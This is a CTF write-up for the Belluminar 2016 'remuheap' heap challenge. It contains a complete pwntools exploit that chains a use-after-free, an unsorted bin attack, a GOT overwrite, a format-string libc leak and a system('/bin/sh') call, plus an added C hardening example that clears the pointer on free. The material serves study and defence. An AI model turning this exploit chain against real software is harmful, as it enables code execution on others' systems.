Belluminar 2016 remuheap
Pwnable/CTF | 2017. 10. 19. 01:06
When fgets is used, a heap chunk is malloc'd and the input data is written into it.
Using that malloc'd chunk, after the UAF you do an unsorted bin attack, then build a fake chunk in the global variable area (bss),
then leak and exploit.
```python
from pwn import *

p = process("./remuheap")
elf = ELF("./remuheap")

# Menu helpers: 1 = malloc, 2 = free, 3 = modify, 5 = exit.
def malloc(size, data):
    p.recvuntil('> ')
    p.sendline("1")
    p.recvuntil(': ')
    p.sendline(str(size))
    p.recvuntil(': ')
    p.sendline(data)

def free():
    p.recvuntil('> ')
    p.sendline("2")
    print("free")

def modify(age_yn, age, name, nameyn):
    p.recvuntil('> ')
    p.sendline("3")
    p.recvuntil('? ')
    p.sendline(age_yn)
    if age_yn == 'y':
        p.recv(1024)
        p.sendline(str(age))
        print("y input")
    p.recvuntil(': ')
    p.sendline(name)
    p.recvuntil('? ')
    p.sendline(nameyn)

def menu_exit(code):  # named menu_exit so it does not shadow the builtin exit
    p.recvuntil('> ')
    p.sendline("5")
    p.recvuntil(': ')
    p.sendline(str(code))

person_info = 0x6020d0  # global (bss) person structure

# UAF: free the chunk, then keep writing into it through the dangling pointer.
malloc(4096, "A" * 10)
free()
modify('y', 32, "B" * 10, 'y')
free()
# Unsorted bin attack: fd/bk of the freed chunk point at person_info-0x18.
modify('y', 32, p64(0) + p64(person_info - 0x18), 'y')
menu_exit(0x211)
# Fake chunk in bss: the next allocation lands over person_info.
malloc(514, p64(elf.got['atoi'] - 0x8) + p64(elf.got['atoi'] - 0x8))
# Overwrite atoi@GOT with printf@PLT, then leak via a format string.
modify('n', 32, p64(elf.plt['printf']), 'y')
p.recv(1024)
p.sendline("%7$p")
puts = int(p.recv(14), 16) - 362  # -362
# libc offsets used by the author for the challenge's libc.
libc_base = puts - 0x6f690
oneshot = libc_base + 0x4526a
system = libc_base + 0x45390
print(hex(puts))
print(hex(libc_base))
print(hex(system))
# Replace printf@PLT in the GOT slot with system, then call it with "/bin/sh".
p.recv(1024)
p.sendline("33")
p.recvuntil('? ')
p.sendline('n')
p.recvuntil(': ')
p.sendline(p64(system))
p.recvuntil('? ')
p.sendline('y')
p.sendline("/bin/sh\00")
p.interactive()
```
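The whole chain above only works because the program keeps using the heap pointer after free: modify still writes through it (the UAF) and free can be called a second time (the double free that sets up the unsorted bin attack). The following is an added example, not the challenge binary or the author's code: a small C model of the same allocate / free / modify menu in which the global record tracks whether a chunk is live, so both the write-after-free and the second free are refused. The struct layout, field names and function names are assumptions, not the real remuheap layout.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model of the challenge's person record: a global (bss)
 * pointer to a heap name buffer plus an age. Layout is assumed. */
struct person {
    char *name;      /* heap buffer filled from user input */
    size_t name_sz;  /* size passed to the allocation */
    int age;
};

static struct person g_person;   /* lives in .bss, like person_info */

/* All helpers return 0 on success and -1 when the request is refused. */
int person_alloc(size_t size) {
    if (g_person.name != NULL || size == 0 || size > 4096)
        return -1;                   /* already live, or bad size */
    g_person.name = calloc(1, size);
    if (g_person.name == NULL)
        return -1;
    g_person.name_sz = size;
    return 0;
}

int person_free(void) {
    if (g_person.name == NULL)
        return -1;                   /* refuse a second free */
    free(g_person.name);
    g_person.name = NULL;            /* clear the pointer: no dangling chunk */
    g_person.name_sz = 0;
    return 0;
}

int person_modify(int age, const char *name) {
    if (g_person.name == NULL)
        return -1;                   /* refuse write-after-free */
    g_person.age = age;
    /* bounded copy, always NUL-terminated */
    strncpy(g_person.name, name, g_person.name_sz - 1);
    g_person.name[g_person.name_sz - 1] = '\0';
    return 0;
}

const char *person_name(void) {
    return g_person.name;            /* NULL when nothing is live */
}

/* Replays the writeup's menu order (alloc, free, modify, free, modify)
 * against the hardened helpers and returns how many steps were refused.
 * With the pointer cleared on free, the two UAF writes and the second
 * free are all rejected. */
int replay_writeup_sequence(void) {
    int refused = 0;
    refused += person_alloc(4096) != 0;
    refused += person_free() != 0;
    refused += person_modify(32, "BBBBBBBBBB") != 0;  /* UAF write */
    refused += person_free() != 0;                    /* double free */
    refused += person_modify(32, "fake chunk") != 0;  /* UAF write */
    return refused;
}

int main(void) {
    printf("refused steps: %d\n", replay_writeup_sequence());
    return 0;
}
```

The point is the state check, not the bounded copy: once free() also clears the pointer, the modify and second free steps that the exploit depends on simply return an error, and the unsorted bin attack has nothing to write through.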